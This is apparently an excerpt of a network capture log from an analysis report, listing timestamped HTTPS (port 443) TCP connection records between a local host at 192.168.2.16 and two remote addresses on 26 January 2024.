                                                                                                                                                                                    Jan 26, 2024 14:42:22.924242020 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.924272060 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.924329042 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.924585104 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.924599886 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.924897909 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.924911976 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.926815987 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.926840067 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.926894903 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.927058935 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.927073002 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.201780081 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.205050945 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.205060005 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.205457926 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.206497908 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.206561089 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.206954956 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.217003107 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.217211962 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.217225075 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.217881918 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.218154907 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.218241930 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.218617916 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.219312906 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.219686985 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.219700098 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.220740080 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.220813990 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.221103907 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.221168041 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.221296072 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.221303940 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.249907970 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.261904955 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.266263962 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712563992 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712618113 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712668896 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712702036 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712752104 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712771893 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712795973 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712845087 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712891102 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712898970 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712912083 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.712991953 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.713222980 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.713270903 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.713288069 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.713295937 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.713381052 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.713388920 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714006901 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714042902 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714078903 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714088917 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714162111 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714165926 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.714255095 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724468946 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724546909 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724586010 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724595070 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724617004 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724654913 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724659920 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724666119 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724698067 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724703074 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724777937 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724817991 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.724824905 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.725227118 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.725265980 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.725281000 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.725286007 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.725325108 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.725330114 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726053953 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726094961 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726105928 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726111889 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726166010 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726187944 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726193905 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726233006 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726783991 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726871014 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726907969 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726912975 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726919889 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.726958990 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727709055 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727768898 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727807045 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727827072 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727833986 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727865934 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.727871895 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.728547096 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.728586912 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.728596926 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.728604078 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.728641033 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.728646040 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729444981 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729481936 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729497910 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729501963 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729530096 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729538918 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729542971 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.729590893 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730134010 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730214119 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730263948 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730266094 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730279922 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730319977 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.730326891 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.731021881 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.731079102 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.731086969 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.749222994 CET49831443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.749249935 CET44349831104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.775229931 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.842520952 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.842782974 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843238115 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843317986 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843328953 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843365908 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843446970 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843453884 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.843528986 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.844036102 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.844116926 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.844868898 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.844944954 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.844958067 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.844966888 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.845014095 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.845352888 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.845424891 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.845437050 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.845506907 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846182108 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846261024 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846709013 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846736908 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846786022 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846792936 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846878052 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846899986 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.846966028 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.847165108 CET49830443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.847182035 CET44349830104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.852567911 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.852591991 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:23.852721930 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.853049994 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:23.853060007 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050285101 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050343990 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050384998 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050417900 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050424099 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050437927 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050474882 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050503016 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050554991 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050559044 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050566912 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050612926 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050622940 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050657034 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050703049 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.050710917 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.051460028 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.051501036 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.051512957 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.051520109 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.051564932 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.051573992 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052100897 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052139997 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052145958 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052154064 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052198887 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052206039 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052932024 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052978039 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052983046 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.052992105 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053034067 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053046942 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053724051 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053761959 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053772926 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053780079 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053822041 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053822994 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053836107 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.053884029 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.100388050 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.111432076 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.111444950 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.111813068 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.112628937 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.112689018 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.113543034 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145322084 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145714045 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145747900 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145807981 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145823956 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145908117 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.145919085 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146150112 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146183014 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146248102 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146256924 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146332026 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146605968 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146676064 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146714926 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146739960 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146747112 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.146838903 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.147281885 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.147355080 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.147440910 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.147448063 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.153904915 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.168540001 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.168703079 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.168726921 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.168787956 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.168901920 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.168956041 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.169750929 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.169790983 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.169815063 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.169821978 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.169847965 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.170548916 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.170624018 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.170633078 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171360970 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171401978 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171432018 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171438932 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171504974 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171513081 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171566963 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171603918 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.171665907 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.175323963 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.175343990 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.517029047 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.517074108 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.517251968 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.517657042 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.517716885 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.517779112 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.518032074 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.518047094 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.518132925 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.518148899 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.594492912 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.594639063 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.594712019 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.595510006 CET49832443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.595523119 CET44349832104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.605674982 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:24.605715990 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.605779886 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:24.606141090 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:24.606151104 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.807297945 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.808202028 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.813513041 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.813525915 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.813657045 CET49834443192.168.2.16104.21.79.9
